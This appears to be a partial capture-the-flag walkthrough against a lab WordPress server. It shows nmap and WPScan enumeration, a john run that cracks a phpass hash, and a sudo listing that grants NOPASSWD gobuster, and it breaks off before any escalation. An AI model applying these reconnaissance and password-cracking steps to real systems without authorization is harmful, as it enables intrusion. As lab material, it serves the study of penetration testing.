┌──(root㉿kakeru)-[~/tmp] └─# nmap -A 192.168.240.231 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-0514:48 CST Nmap scan report for 192.168.240.231 (192.168.240.231) Host is up (0.0020s latency). Not shown:998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0) | ssh-hostkey: | 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA) | 2563e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA) |_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519) 80/tcp open http nginx 1.14.2 | http-robots.txt:1 disallowed entry |_/wp-admin/ |_http-server-header: nginx/1.14.2 |_http-title: bammmmuwe |_http-generator: WordPress 6.7.1 MAC Address:6A:4C:9F:02:22:6E (Unknown) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15-5.19, OpenWrt 21.02 (Linux 5.4) Network Distance:1 hop Service Info:OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 12.05 ms 192.168.240.231 (192.168.240.231)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done:1 IP address (1 host up) scanned in15.13 seconds
WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://192.168.240.231/ [192.168.240.231] [+] Started: Wed Feb 514:57:352025
[+] XML-RPC seems to be enabled: http://192.168.240.231/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence:100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.240.231/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence:100%
[+] The external WP-Cron seems to be enabled: http://192.168.240.231/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence:60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21). | Found By: Meta Generator (Passive Detection) | - http://192.168.240.231/, Match: 'WordPress 6.7.1' | Confirmed By: Rss Generator (Aggressive Detection) | - http://192.168.240.231/feed/, <generator>https://wordpress.org/?v=6.7.1</generator> | - http://192.168.240.231/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations -Time:01:58:02<=============================> (108898/108898) 100.00% Time:01:58:02 [+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet | Location: http://192.168.240.231/wp-content/plugins/akismet/ | Last Updated:2025-02-04T21:01:00.000Z | Readme: http://192.168.240.231/wp-content/plugins/akismet/readme.txt | [!] The version is out of date, the latest version is 5.3.6 | | Found By: Known Locations (Aggressive Detection) | - http://192.168.240.231/wp-content/plugins/akismet/, status:200 | | Version:5.3.5 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://192.168.240.231/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://192.168.240.231/wp-content/plugins/akismet/readme.txt
[+] feed | Location: http://192.168.240.231/wp-content/plugins/feed/ | | Found By: Known Locations (Aggressive Detection) | - http://192.168.240.231/wp-content/plugins/feed/, status:200 | | The version could not be determined.
// ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' );
┌──(root㉿kakeru)-[~/tmp] └─# john tmp Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst Proceeding with incremental:ASCII 104567 (?) 1g 0:00:00:22 DONE 3/3 (2025-02-0518:05) 0.04403g/s8169p/s8169c/s8169C/s milling1..192011 Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed.
有一个gobuster的sudo权限
1 2 3 4 5 6
$ sudo -l MatchingDefaults entries for welcome on listen: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen: (ALL) NOPASSWD: /usr/bin/gobuster